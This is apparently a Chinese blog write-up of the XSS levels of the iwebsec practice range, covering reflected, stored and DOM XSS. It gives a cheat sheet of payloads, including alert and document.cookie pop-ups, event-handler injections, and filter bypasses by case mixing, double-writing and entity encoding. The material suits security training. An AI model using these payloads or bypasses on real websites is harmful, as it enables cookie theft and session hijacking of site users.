web综合靶场【iwebsec】--XSS漏洞

01-反射型XSS漏洞
在这里插入图片描述
下面给了提示:/01.php?name=iwebsec
随便输入一个nihao看看
在这里插入图片描述
反射型特点,输入什么输出什么
接下来用js代码测试,看看有没有xss漏洞

<script>alert(123)</script>

拿cookie
<script>alert(document.cookie)</script>

看图,这个弹窗并没有什么实际的意义,但通过它我们知道输入javascript代码是可以被执行的,当我们输入一些其他函数,比如document.cookie就可以成功盗取用户的cookie信息
在这里插入图片描述
拿到cookie值
在这里插入图片描述
补充一个好玩的
通过<iframe src="http://www.7k7k.com/" width="200" height="400">#document</iframe>可以将7k7k小游戏回显出来
在这里插入图片描述
补充重用语句

常用语句:
<script>alert(123)</script> 
<iframe src="http://www.7k7k.com/" width="200" height="400">#document</iframe>
<script> alert(document.cookie) </script>

<img src=x onerror=alert(1)> 
<svg onload=alert(1)> 
<a href=javascript:alert(1)>
<script>alter('dreeee')</script>;

用于探测的万能语句:
<SCRscriptIPT>'"()Oonnjavascript

标签溢出:
"> <script>alert('dreeee')</script>;

当“<>”被转义时:
' οnmοuseοver='alert(/dreeee/)

构造伪链接:
"><a href=javascript:alert(/dreeee/)>别点我没结果</a>

大小写绕过:
"><a hREf=javascript:alert(/dreeee/)>别点我没结果</a>

双写绕过:
"><SCRSCRIPTIPT>alert(/xss/)</SCRSCRIPTIPT>

转码绕过:
javas&#99;r&#13ipt:alert(/dreeee/)
javas&#99;r&#13ipt:alert('http://')

02-存储型XSS漏洞
在这里插入图片描述
通过将恶意Js语句上传给服务器,当有其他用户查看时,恶意语句会被浏览器解析并执行

文本框中输入

<script>alert(123)</script> 

在这里插入图片描述
同理输入<script> alert(document.cookie) </script>就能够拿到cookie
也同理输入<iframe src="http://www.7k7k.com/" width="200" height="400">#document</iframe>就能够回显7k7k小游戏
在这里插入图片描述
03-DOM XSS漏洞

<img src= onerror=alert(document.cookie)> 

拿到cookie
在这里插入图片描述

  • 2
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值